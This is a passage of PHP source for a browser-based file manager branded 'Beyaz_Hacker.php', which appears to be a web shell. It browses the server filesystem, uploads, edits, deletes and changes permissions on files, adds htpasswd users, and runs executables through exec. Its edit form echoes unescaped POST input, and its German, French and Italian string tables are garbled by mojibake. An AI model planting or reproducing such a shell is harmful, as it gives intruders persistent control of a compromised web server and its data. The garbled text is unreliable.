  1014.     if (@is_dir($file) && !@is_link($file)) {
  1015.  
  1016.         $success = false;
  1017.  
  1018.         if (@rmdir($file)) {
  1019.  
  1020.             $success = true;
  1021.  
  1022.         } elseif ($dir = @opendir($file)) {
  1023.  
  1024.             $success = true;
  1025.  
  1026.             while (($f = readdir($dir)) !== false) {
  1027.                 if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
  1028.                     $success = false;
  1029.                 }
  1030.             }
  1031.             closedir($dir);
  1032.  
  1033.             if ($success) $success = @rmdir($file);
  1034.  
  1035.         }
  1036.  
  1037.         return $success;
  1038.  
  1039.     }
  1040.  
  1041.     return @unlink($file);
  1042.  
  1043. }
  1044.  
  1045. function addslash ($directory) {
  1046.     global $delim;
  1047.  
  1048.     if (substr($directory, -1, 1) != $delim) {
  1049.         return $directory . $delim;
  1050.     } else {
  1051.         return $directory;
  1052.     }
  1053.  
  1054. }
  1055.  
  1056. function relative2absolute ($string, $directory) {
  1057.  
  1058.     if (path_is_relative($string)) {
  1059.         return simplify_path(addslash($directory) . $string);
  1060.     } else {
  1061.         return simplify_path($string);
  1062.     }
  1063.  
  1064. }
  1065.  
  1066. function path_is_relative ($path) {
  1067.     global $win;
  1068.  
  1069.     if ($win) {
  1070.         return (substr($path, 1, 1) != ':');
  1071.     } else {
  1072.         return (substr($path, 0, 1) != '/');
  1073.     }
  1074.  
  1075. }
  1076.  
  1077. function absolute2relative ($directory, $target) {
  1078.     global $delim;
  1079.  
  1080.     $path = '';
  1081.     while ($directory != $target) {
  1082.         if ($directory == substr($target, 0, strlen($directory))) {
  1083.             $path .= substr($target, strlen($directory));
  1084.             break;
  1085.         } else {
  1086.             $path .= '..' . $delim;
  1087.             $directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
  1088.         }
  1089.     }
  1090.     if ($path == '') $path = '.';
  1091.  
  1092.     return $path;
  1093.  
  1094. }
  1095.  
  1096. function simplify_path ($path) {
  1097.     global $delim;
  1098.  
  1099.     if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
  1100.         $path = realpath($path);
  1101.         if (@is_dir($path)) {
  1102.             return addslash($path);
  1103.         } else {
  1104.             return $path;
  1105.         }
  1106.     }
  1107.  
  1108.     $pattern  = $delim . '.' . $delim;
  1109.  
  1110.     if (@is_dir($path)) {
  1111.         $path = addslash($path);
  1112.     }
  1113.  
  1114.     while (strpos($path, $pattern) !== false) {
  1115.         $path = str_replace($pattern, $delim, $path);
  1116.     }
  1117.  
  1118.     $e = addslashes($delim);
  1119.     $regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
  1120.  
  1121.     while (ereg($regex, $path)) {
  1122.         $path = ereg_replace($regex, $delim, $path);
  1123.     }
  1124.    
  1125.     return $path;
  1126.  
  1127. }
  1128.  
  1129. function human_filesize ($filesize) {
  1130.  
  1131.     $suffices = 'kMGTPE';
  1132.  
  1133.     $n = 0;
  1134.     while ($filesize >= 1000) {
  1135.         $filesize /= 1024;
  1136.         $n++;
  1137.     }
  1138.  
  1139.     $filesize = round($filesize, 3 - strpos($filesize, '.'));
  1140.  
  1141.     if (strpos($filesize, '.') !== false) {
  1142.         while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
  1143.             $filesize = substr($filesize, 0, strlen($filesize) - 1);
  1144.         }
  1145.     }
  1146.  
  1147.     $suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
  1148.  
  1149.     return $filesize . " {$suffix}B";
  1150.  
  1151. }
  1152.  
  1153. function strip (&$str) {
  1154.     $str = stripslashes($str);
  1155. }
  1156.  
  1157. /* ------------------------------------------------------------------------- */
  1158.  
  1159. function listing_page ($message = null) {
  1160.     global $self, $directory, $sort, $reverse;
  1161.  
  1162.     html_header();
  1163.  
  1164.     $list = getlist($directory);
  1165.  
  1166.     if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
  1167.     if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
  1168.  
  1169.     $list = sortlist($list, $sort, $reverse);
  1170.  
  1171.     echo '<h1 style="margin-bottom: 0">Beyaz_Hacker.php</h1>
  1172.  
  1173. <form enctype="multipart/form-data" action="' . $self . '" method="post">
  1174.  
  1175. <table id="main">
  1176. ';
  1177.  
  1178.     directory_choice();
  1179.  
  1180.     if (!empty($message)) {
  1181.         spacer();
  1182.         echo $message;
  1183.     }
  1184.  
  1185.     if (@is_writable($directory)) {
  1186.         upload_box();
  1187.         create_box();
  1188.     } else {
  1189.         spacer();
  1190.     }
  1191.  
  1192.     if ($list) {
  1193.         listing($list);
  1194.     } else {
  1195.         echo error('not_readable', $directory);
  1196.     }
  1197.  
  1198.     echo '</table>
  1199.  
  1200. </form>
  1201.  
  1202. ';
  1203.  
  1204.     html_footer();
  1205.  
  1206. }
  1207.  
  1208. function listing ($list) {
  1209.     global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
  1210.  
  1211.     echo '<tr class="listing">
  1212.     <th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
  1213. ';
  1214.  
  1215.     column_title('filename', $sort, $reverse);
  1216.     column_title('size', $sort, $reverse);
  1217.  
  1218.     if (!$win) {
  1219.         column_title('permission', $sort, $reverse);
  1220.         column_title('owner', $sort, $reverse);
  1221.         column_title('group', $sort, $reverse);
  1222.     }
  1223.  
  1224.     echo '  <th class="functions">' . word('functions') . '</th>
  1225. </tr>
  1226. ';
  1227.  
  1228.     for ($i = 0; $i < sizeof($list); $i++) {
  1229.         $file = $list[$i];
  1230.  
  1231.         $timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
  1232.         $timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
  1233.         $timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
  1234.  
  1235.         echo '<tr class="listing">
  1236.     <td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
  1237.     <td class="filename" title="' . html($timestamps) . '">';
  1238.  
  1239.         if ($file['is_link']) {
  1240.  
  1241.             echo '<img src="' . $self . '?image=link" alt="link" /> ';
  1242.             echo html($file['filename']) . ' &rarr; ';
  1243.  
  1244.             $real_file = relative2absolute($file['target'], $directory);
  1245.  
  1246.             if (@is_readable($real_file)) {
  1247.                 if (@is_dir($real_file)) {
  1248.                     echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
  1249.                 } else {
  1250.                     echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
  1251.                 }
  1252.             } else {
  1253.                 echo html($file['target']);
  1254.             }
  1255.  
  1256.         } elseif ($file['is_dir']) {
  1257.  
  1258.             echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
  1259.             if ($win || $file['is_executable']) {
  1260.                 echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
  1261.             } else {
  1262.                 echo html($file['filename']);
  1263.             }
  1264.             echo ' ]';
  1265.  
  1266.         } else {
  1267.  
  1268.             if (substr($file['filename'], 0, 1) == '.') {
  1269.                 echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
  1270.             } else {
  1271.                 echo '<img src="' . $self . '?image=file" alt="file" /> ';
  1272.             }
  1273.  
  1274.             if ($file['is_file'] && $file['is_readable']) {
  1275.                echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
  1276.             } else {
  1277.                 echo html($file['filename']);
  1278.             }
  1279.  
  1280.         }
  1281.  
  1282.         if ($file['size'] >= 1000) {
  1283.             $human = ' title="' . human_filesize($file['size']) . '"';
  1284.         } else {
  1285.             $human = '';
  1286.         }
  1287.  
  1288.         echo "</td>\n";
  1289.  
  1290.         echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
  1291.  
  1292.         if (!$win) {
  1293.  
  1294.             echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
  1295.  
  1296.             $l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
  1297.             if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
  1298.             echo html(permission_octal2string($file['permission']));
  1299.             if ($l) echo '</a>';
  1300.  
  1301.             echo "</td>\n";
  1302.  
  1303.             if (array_key_exists('owner_name', $file)) {
  1304.                 echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
  1305.             } else {
  1306.                 echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
  1307.             }
  1308.  
  1309.             if (array_key_exists('group_name', $file)) {
  1310.                 echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
  1311.             } else {
  1312.                 echo "\t<td class=\"group\">{$file['group']}</td>\n";
  1313.             }
  1314.  
  1315.         }
  1316.  
  1317.         echo '  <td class="functions">
  1318.         <input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
  1319. ';
  1320.  
  1321.         $actions = array();
  1322.         if (function_exists('symlink')) {
  1323.             $actions[] = 'create_symlink';
  1324.         }
  1325.         if (@is_writable(dirname($file['path']))) {
  1326.             $actions[] = 'delete';
  1327.             $actions[] = 'rename';
  1328.             $actions[] = 'move';
  1329.         }
  1330.         if ($file['is_file'] && $file['is_readable']) {
  1331.             $actions[] = 'copy';
  1332.             $actions[] = 'download';
  1333.             if ($file['is_writable']) $actions[] = 'edit';
  1334.         }
  1335.         if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
  1336.             $actions[] = 'execute';
  1337.         }
  1338.  
  1339.         if (sizeof($actions) > 0) {
  1340.  
  1341.             echo '      <select class="small" name="action' . $i . '" size="1">
  1342.         <option value="">' . str_repeat('&nbsp;', 30) . '</option>
  1343. ';
  1344.  
  1345.             foreach ($actions as $action) {
  1346.                 echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
  1347.             }
  1348.  
  1349.             echo '      </select>
  1350.         <input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
  1351. ';
  1352.  
  1353.         }
  1354.  
  1355.         echo '  </td>
  1356. </tr>
  1357. ';
  1358.  
  1359.     }
  1360.  
  1361.     echo '<tr class="listing_footer">
  1362.     <td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
  1363.     <td colspan="' . ($cols - 1) . '">
  1364.         <input type="hidden" name="num" value="' . sizeof($list) . '" />
  1365.         <input type="hidden" name="focus" value="" />
  1366.         <input type="hidden" name="olddir" value="' . html($directory) . '" />
  1367. ';
  1368.  
  1369.     $actions = array();
  1370.     if (@is_writable(dirname($file['path']))) {
  1371.         $actions[] = 'delete';
  1372.         $actions[] = 'move';
  1373.     }
  1374.     $actions[] = 'copy';
  1375.  
  1376.     echo '      <select class="small" name="action_all" size="1">
  1377.         <option value="">' . str_repeat('&nbsp;', 30) . '</option>
  1378. ';
  1379.  
  1380.     foreach ($actions as $action) {
  1381.         echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
  1382.     }
  1383.  
  1384.     echo '      </select>
  1385.         <input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
  1386.     </td>
  1387. </tr>
  1388. ';
  1389.  
  1390. }
  1391.  
  1392. function column_title ($column, $sort, $reverse) {
  1393.     global $self, $directory;
  1394.  
  1395.     $d = 'dir=' . urlencode($directory) . '&amp;';
  1396.  
  1397.     if ($sort == $column) {
  1398.         if (!$reverse) {
  1399.             $r = '&amp;reverse=true';
  1400.             $arr = ' &and;';
  1401.         } else {
  1402.             $arr = ' &or;';
  1403.         }
  1404.     } else {
  1405.         $r = '';
  1406.     }
  1407.     echo "\t<th class=\"$column\"><a href=\"$self?{$d}sort=$column$r\">" . word($column) . "</a>$arr</th>\n";
  1408.  
  1409. }
  1410.  
  1411. function directory_choice () {
  1412.     global $directory, $homedir, $cols, $self;
  1413.  
  1414.     echo '<tr>
  1415.     <td colspan="' . $cols . '" id="directory">
  1416.         <a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
  1417.         <input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
  1418.         <input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
  1419.     </td>
  1420. </tr>
  1421. ';
  1422.  
  1423. }
  1424.  
  1425. function upload_box () {
  1426.     global $cols;
  1427.  
  1428.     echo '<tr>
  1429.     <td colspan="' . $cols . '" id="upload">
  1430.         ' . word('file') . ':
  1431.         <input type="file" name="upload" onfocus="activate(\'other\')" />
  1432.         <input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
  1433.     </td>
  1434. </tr>
  1435. ';
  1436.  
  1437. }
  1438.  
  1439. function create_box () {
  1440.     global $cols;
  1441.  
  1442.     echo '<tr>
  1443.     <td colspan="' . $cols . '" id="create">
  1444.         <select name="create_type" size="1" onfocus="activate(\'create\')">
  1445.         <option value="file">' . word('file') . '</option>
  1446.         <option value="directory">' . word('directory') . '</option>
  1447.         </select>
  1448.         <input type="text" name="create_name" onfocus="activate(\'create\')" />
  1449.         <input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
  1450.     </td>
  1451. </tr>
  1452. ';
  1453.  
  1454. }
  1455.  
  1456. function edit ($file) {
  1457.     global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
  1458.  
  1459.     html_header();
  1460.  
  1461.     echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
  1462.  
  1463. <form action="' . $self . '" method="post">
  1464.  
  1465. <table class="dialog">
  1466. <tr>
  1467. <td class="dialog">
  1468.  
  1469.     <textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
  1470.  
  1471.     if (array_key_exists('content', $_POST)) {
  1472.         echo $_POST['content'];
  1473.     } else {
  1474.         $f = fopen($file, 'r');
  1475.         while (!feof($f)) {
  1476.             echo html(fread($f, 8192));
  1477.         }
  1478.         fclose($f);
  1479.     }
  1480.  
  1481.     if (!empty($_POST['user'])) {
  1482.         echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
  1483.     }
  1484.     if (!empty($_POST['basic_auth'])) {
  1485.         if ($win) {
  1486.             $authfile = str_replace('\\', '/', $directory) . $htpasswd;
  1487.         } else {
  1488.             $authfile = $directory . $htpasswd;
  1489.         }
  1490.         echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
  1491.         echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
  1492.         echo 'Require valid-user';
  1493.     }
  1494.  
  1495.     echo '</textarea>
  1496.  
  1497.     <hr />
  1498. ';
  1499.  
  1500.     if ($apache && basename($file) == $htpasswd) {
  1501.         echo '
  1502.     ' . word('user') . ': <input type="text" name="user" />
  1503.     ' . word('password') . ': <input type="password" name="password" />
  1504.     <input type="submit" value="' . word('add') . '" />
  1505.  
  1506.     <hr />
  1507. ';
  1508.  
  1509.     }
  1510.  
  1511.     if ($apache && basename($file) == $htaccess) {
  1512.         echo '
  1513.     <input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
  1514.  
  1515.     <hr />
  1516. ';
  1517.  
  1518.     }
  1519.  
  1520.     echo '
  1521.     <input type="hidden" name="action" value="edit" />
  1522.     <input type="hidden" name="file" value="' . html($file) . '" />
  1523.     <input type="hidden" name="dir" value="' . html($directory) . '" />
  1524.     <input type="reset" value="' . word('reset') . '" id="red_button" />
  1525.     <input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
  1526.  
  1527. </td>
  1528. </tr>
  1529. </table>
  1530.  
  1531. <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
  1532.  
  1533. </form>
  1534.  
  1535. ';
  1536.  
  1537.     html_footer();
  1538.  
  1539. }
  1540.  
  1541. function spacer () {
  1542.     global $cols;
  1543.  
  1544.     echo '<tr>
  1545.     <td colspan="' . $cols . '" style="height: 1em"></td>
  1546. </tr>
  1547. ';
  1548.  
  1549. }
  1550.  
  1551. function textfieldsize ($content) {
  1552.  
  1553.     $size = strlen($content) + 5;
  1554.     if ($size < 30) $size = 30;
  1555.  
  1556.     return $size;
  1557.  
  1558. }
  1559.  
  1560. function request_dump () {
  1561.  
  1562.     foreach ($_REQUEST as $key => $value) {
  1563.         echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
  1564.     }
  1565.  
  1566. }
  1567.  
  1568. /* ------------------------------------------------------------------------- */
  1569.  
  1570. function html ($string) {
  1571.     global $site_charset;
  1572.     return htmlentities($string, ENT_COMPAT, $site_charset);
  1573. }
  1574.  
  1575. function word ($word) {
  1576.     global $words, $word_charset;
  1577.     return htmlentities($words[$word], ENT_COMPAT, $word_charset);
  1578. }
  1579.  
  1580. function phrase ($phrase, $arguments) {
  1581.     global $words;
  1582.     static $search;
  1583.  
  1584.     if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
  1585.  
  1586.     for ($i = 0; $i < sizeof($arguments); $i++) {
  1587.         $arguments[$i] = nl2br(html($arguments[$i]));
  1588.     }
  1589.  
  1590.     $replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
  1591.  
  1592.     return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
  1593.  
  1594. }
  1595.  
  1596. function getwords ($lang) {
  1597.     global $word_charset, $date_format;
  1598.  
  1599.     switch ($lang) {
  1600.     case 'de':
  1601.  
  1602.         $date_format = 'd.m.y H:i:s';
  1603.         $word_charset = 'ISO-8859-1';
  1604.  
  1605.         return array(
  1606. 'directory' => 'Verzeichnis',
  1607. 'file' => 'Datei',
  1608. 'filename' => 'Dateiname',
  1609.  
  1610. 'size' => 'Gr����¯�¿�½������¶����¯�¿�½���¯���¿���½e',
  1611. 'permission' => 'Rechte',
  1612. 'owner' => 'Eigner',
  1613. 'group' => 'Gruppe',
  1614. 'other' => 'Andere',
  1615. 'functions' => 'Funktionen',
  1616.  
  1617. 'read' => 'lesen',
  1618. 'write' => 'schreiben',
  1619. 'execute' => 'ausf����¯�¿�½������¼hren',
  1620.  
  1621. 'create_symlink' => 'Symlink erstellen',
  1622. 'delete' => 'l����¯�¿�½������¶schen',
  1623. 'rename' => 'umbenennen',
  1624. 'move' => 'verschieben',
  1625. 'copy' => 'kopieren',
  1626. 'edit' => 'editieren',
  1627. 'download' => 'herunterladen',
  1628. 'upload' => 'hochladen',
  1629. 'create' => 'erstellen',
  1630. 'change' => 'wechseln',
  1631. 'save' => 'speichern',
  1632. 'set' => 'setze',
  1633. 'reset' => 'zur����¯�¿�½������¼cksetzen',
  1634. 'relative' => 'Pfad zum Ziel relativ',
  1635.  
  1636. 'yes' => 'Ja',
  1637. 'no' => 'Nein',
  1638. 'back' => 'zur����¯�¿�½������¼ck',
  1639. 'destination' => 'Ziel',
  1640. 'symlink' => 'Symbolischer Link',
  1641. 'no_output' => 'keine Ausgabe',
  1642.  
  1643. 'user' => 'Benutzername',
  1644. 'password' => 'Kennwort',
  1645. 'add' => 'hinzuf����¯�¿�½������¼gen',
  1646. 'add_basic_auth' => 'HTTP-Basic-Auth hinzuf����¯�¿�½������¼gen',
  1647.  
  1648. 'uploaded' => '"[%1]" wurde hochgeladen.',
  1649. 'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
  1650. 'already_exists' => '"[%1]" existiert bereits.',
  1651. 'created' => '"[%1]" wurde erstellt.',
  1652. 'not_created' => '"[%1]" konnte nicht erstellt werden.',
  1653. 'really_delete' => 'Sollen folgende Dateien wirklich gel����¯�¿�½������¶scht werden?',
  1654. 'deleted' => "Folgende Dateien wurden gel����¯�¿�½������¶scht:\n[%1]",
  1655. 'not_deleted' => "Folgende Dateien konnten nicht gel����¯�¿�½������¶scht werden:\n[%1]",
  1656. 'rename_file' => 'Benenne Datei um:',
  1657. 'renamed' => '"[%1]" wurde in "[%2]" umbenannt.',
  1658. 'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
  1659. 'move_files' => 'Verschieben folgende Dateien:',
  1660. 'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
  1661. 'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
  1662. 'copy_files' => 'Kopiere folgende Dateien:',
  1663. 'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
  1664. 'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
  1665. 'not_edited' => '"[%1]" kann nicht editiert werden.',
  1666. 'executed' => "\"[%1]\" wurde erfolgreich ausgef����¯�¿�½������¼hrt:\n{%2}",
  1667. 'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgef����¯�¿�½������¼hrt werden:\n{%2}",
  1668. 'saved' => '"[%1]" wurde gespeichert.',
  1669. 'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
  1670. 'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
  1671. 'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
  1672. 'permission_for' => 'Rechte f����¯�¿�½������¼r "[%1]":',
  1673. 'permission_set' => 'Die Rechte f����¯�¿�½������¼r "[%1]" wurden auf [%2] gesetzt.',
  1674. 'permission_not_set' => 'Die Rechte f����¯�¿�½������¼r "[%1]" konnten nicht auf [%2] gesetzt werden.',
  1675. 'not_readable' => '"[%1]" kann nicht gelesen werden.'
  1676.         );
  1677.  
  1678.     case 'fr':
  1679.  
  1680.         $date_format = 'd.m.y H:i:s';
  1681.         $word_charset = 'ISO-8859-1';
  1682.  
  1683.         return array(
  1684. 'directory' => 'R����¯�¿�½������©pertoire',
  1685. 'file' => 'Fichier',
  1686. 'filename' => 'Nom fichier',
  1687.  
  1688. 'size' => 'Taille',
  1689. 'permission' => 'Droits',
  1690. 'owner' => 'Propri����¯�¿�½������©taire',
  1691. 'group' => 'Groupe',
  1692. 'other' => 'Autres',
  1693. 'functions' => 'Fonctions',
  1694.  
  1695. 'read' => 'Lire',
  1696. 'write' => 'Ecrire',
  1697. 'execute' => 'Ex����¯�¿�½������©cuter',
  1698.  
  1699. 'create_symlink' => 'Cr����¯�¿�½������©er lien symbolique',
  1700. 'delete' => 'Effacer',
  1701. 'rename' => 'Renommer',
  1702. 'move' => 'D����¯�¿�½������©placer',
  1703. 'copy' => 'Copier',
  1704. 'edit' => 'Ouvrir',
  1705. 'download' => 'T����¯�¿�½������©l����¯�¿�½������©charger sur PC',
  1706. 'upload' => 'T����¯�¿�½������©l����¯�¿�½������©charger sur serveur',
  1707. 'create' => 'Cr����¯�¿�½������©er',
  1708. 'change' => 'Changer',
  1709. 'save' => 'Sauvegarder',
  1710. 'set' => 'Ex����¯�¿�½������©cuter',
  1711. 'reset' => 'R����¯�¿�½������©initialiser',
  1712. 'relative' => 'Relatif',
  1713.  
  1714. 'yes' => 'Oui',
  1715. 'no' => 'Non',
  1716. 'back' => 'Retour',
  1717. 'destination' => 'Destination',
  1718. 'symlink' => 'Lien symbollique',
  1719. 'no_output' => 'Pas de sortie',
  1720.  
  1721. 'user' => 'Utilisateur',
  1722. 'password' => 'Mot de passe',
  1723. 'add' => 'Ajouter',
  1724. 'add_basic_auth' => 'add basic-authentification',
  1725.  
  1726. 'uploaded' => '"[%1]" a ����¯�¿�½������©t����¯�¿�½������© t����¯�¿�½������©l����¯�¿�½������©charg����¯�¿�½������© sur le serveur.',
  1727. 'not_uploaded' => '"[%1]" n a pas ����¯�¿�½������©t����¯�¿�½������© t����¯�¿�½������©l����¯�¿�½������©charg����¯�¿�½������© sur le serveur.',
  1728. 'already_exists' => '"[%1]" existe d����¯�¿�½������©j����¯�¿�½ .',
  1729. 'created' => '"[%1]" a ����¯�¿�½������©t����¯�¿�½������© cr����¯�¿�½������©����¯�¿�½������©.',
  1730. 'not_created' => '"[%1]" n a pas pu ����¯�¿�½������ªtre cr����¯�¿�½������©����¯�¿�½������©.',
  1731. 'really_delete' => 'Effacer le fichier?',
  1732. 'deleted' => "Ces fichiers ont ����¯�¿�½������©t����¯�¿�½������© d����¯�¿�½������©tuits:\n[%1]",
  1733. 'not_deleted' => "Ces fichiers n ont pu ����¯�¿�½������ªtre d����¯�¿�½������©truits:\n[%1]",
  1734. 'rename_file' => 'Renomme fichier:',
  1735. 'renamed' => '"[%1]" a ����¯�¿�½������©t����¯�¿�½������© renomm����¯�¿�½������© en "[%2]".',
  1736. 'not_renamed' => '"[%1] n a pas pu ����¯�¿�½������ªtre renomm����¯�¿�½������© en "[%2]".',
  1737. 'move_files' => 'D����¯�¿�½������©placer ces fichiers:',
  1738. 'moved' => "Ces fichiers ont ����¯�¿�½������©t����¯�¿�½������© d����¯�¿�½������©plac����¯�¿�½������©s en \"[%2]\":\n[%1]",
  1739. 'not_moved' => "Ces fichiers n ont pas pu ����¯�¿�½������ªtre d����¯�¿�½������©plac����¯�¿�½������©s en \"[%2]\":\n[%1]",
  1740. 'copy_files' => 'Copier ces fichiers:',
  1741. 'copied' => "Ces fichiers ont ����¯�¿�½������©t����¯�¿�½������© copi����¯�¿�½������©s en \"[%2]\":\n[%1]",
  1742. 'not_copied' => "Ces fichiers n ont pas pu ����¯�¿�½������ªtre copi����¯�¿�½������©s en \"[%2]\":\n[%1]",
  1743. 'not_edited' => '"[%1]" ne peut ����¯�¿�½������ªtre ouvert.',
  1744. 'executed' => "\"[%1]\" a ����¯�¿�½������©t����¯�¿�½������© brillamment ex����¯�¿�½������©cut����¯�¿�½������© :\n{%2}",
  1745. 'not_executed' => "\"[%1]\" n a pas pu ����¯�¿�½������ªtre ex����¯�¿�½������©cut����¯�¿�½������©:\n{%2}",
  1746. 'saved' => '"[%1]" a ����¯�¿�½������©t����¯�¿�½������© sauvegard����¯�¿�½������©.',
  1747. 'not_saved' => '"[%1]" n a pas pu ����¯�¿�½������ªtre sauvegard����¯�¿�½������©.',
  1748. 'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a ����¯�¿�½������©t����¯�¿�½������© cr����¯�¿�½������©e.',
  1749. 'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu ����¯�¿�½������ªtre cr����¯�¿�½������©����¯�¿�½������©.',
  1750. 'permission_for' => 'Droits de "[%1]":',
  1751. 'permission_set' => 'Droits de "[%1]" ont ����¯�¿�½������©t����¯�¿�½������© chang����¯�¿�½������©s en [%2].',
  1752. 'permission_not_set' => 'Droits de "[%1]" n ont pas pu ����¯�¿�½������ªtre chang����¯�¿�½������©s en[%2].',
  1753. 'not_readable' => '"[%1]" ne peut pas ����¯�¿�½������ªtre ouvert.'
  1754.         );
  1755.  
  1756.     case 'it':
  1757.  
  1758.         $date_format = 'd-m-Y H:i:s';
  1759.         $word_charset = 'ISO-8859-1';
  1760.  
  1761.         return array(
  1762. 'directory' => 'Directory',
  1763. 'file' => 'File',
  1764. 'filename' => 'Nome File',
  1765.  
  1766. 'size' => 'Dimensioni',
  1767. 'permission' => 'Permessi',
  1768. 'owner' => 'Proprietario',
  1769. 'group' => 'Gruppo',
  1770. 'other' => 'Altro',
  1771. 'functions' => 'Funzioni',
  1772.  
  1773. 'read' => 'leggi',
  1774. 'write' => 'scrivi',
  1775. 'execute' => 'esegui',
  1776.  
  1777. 'create_symlink' => 'crea link simbolico',
  1778. 'delete' => 'cancella',
  1779. 'rename' => 'rinomina',
  1780. 'move' => 'sposta',
  1781. 'copy' => 'copia',
  1782. 'edit' => 'modifica',
  1783. 'download' => 'download',
  1784. 'upload' => 'upload',
  1785. 'create' => 'crea',
  1786. 'change' => 'cambia',
  1787. 'save' => 'salva',
  1788. 'set' => 'imposta',
  1789. 'reset' => 'reimposta',
  1790. 'relative' => 'Percorso relativo per la destinazione',
  1791.  
  1792. 'yes' => 'Si',
  1793. 'no' => 'No',
  1794. 'back' => 'indietro',
  1795. 'destination' => 'Destinazione',
  1796. 'symlink' => 'Link simbolico',
  1797. 'no_output' => 'no output',
  1798.  
  1799. 'user' => 'User',
  1800. 'password' => 'Password',
  1801. 'add' => 'aggiungi',
  1802. 'add_basic_auth' => 'aggiungi autenticazione base',
  1803.  
  1804. 'uploaded' => '"[%1]" ����¯�¿�½������¨ stato caricato.',
  1805. 'not_uploaded' => '"[%1]" non ����¯�¿�½������¨ stato caricato.',
  1806. 'already_exists' => '"[%1]" esiste gi����¯�¿�½ .',
  1807. 'created' => '"[%1]" ����¯�¿�½������¨ stato creato.',
  1808. 'not_created' => '"[%1]" non ����¯�¿�½������¨ stato creato.',
  1809. 'really_delete' => 'Cancello questi file ?',
  1810. 'deleted' => "Questi file sono stati cancellati:\n[%1]",
  1811. 'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
  1812. 'rename_file' => 'File rinominato:',
  1813. 'renamed' => '"[%1]" ����¯�¿�½������¨ stato rinominato in "[%2]".',
  1814. 'not_renamed' => '"[%1] non ����¯�¿�½������¨ stato rinominato in "[%2]".',
  1815. 'move_files' => 'Sposto questi file:',
  1816. 'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
  1817. 'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
